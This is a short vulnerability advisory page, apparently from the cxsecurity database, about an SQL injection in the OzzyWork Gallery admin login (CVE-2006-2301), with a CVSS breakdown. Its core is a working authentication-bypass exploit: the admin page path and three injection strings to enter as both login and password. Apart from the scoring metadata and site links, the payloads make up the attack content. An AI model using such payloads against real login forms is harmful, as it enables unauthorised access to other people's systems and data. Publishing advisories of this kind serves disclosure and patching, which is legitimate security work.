Bug: OzzyWork Gallery SQL Injection ( Ascii Version )

Search:
WLB2

OzzyWork Gallery SQL Injection

Published
Credit
Risk
2006.05.12
Dj_ReMix_20 hotmail com
High
CWE
CVE
Local
Remote
CWE-89
CVE-2006-2301
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Milli-Harekat Advisory ( www.milli-harekat.org )

# OzzyWork Galeri Admin SQL Injection

# Risk : High

# Script : OzzyWork Gallery All Version

# Credits : Dj ReMix

# Thanks : y Korsan , ESKOBAR , Poizonb0x , TR_IP

OzzyWork Gallery Admin Page's www.victim.com/[Ozzywork Path ]/admin_default.asp

Login and password :

'or'

'or"1=1'

'or"='

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version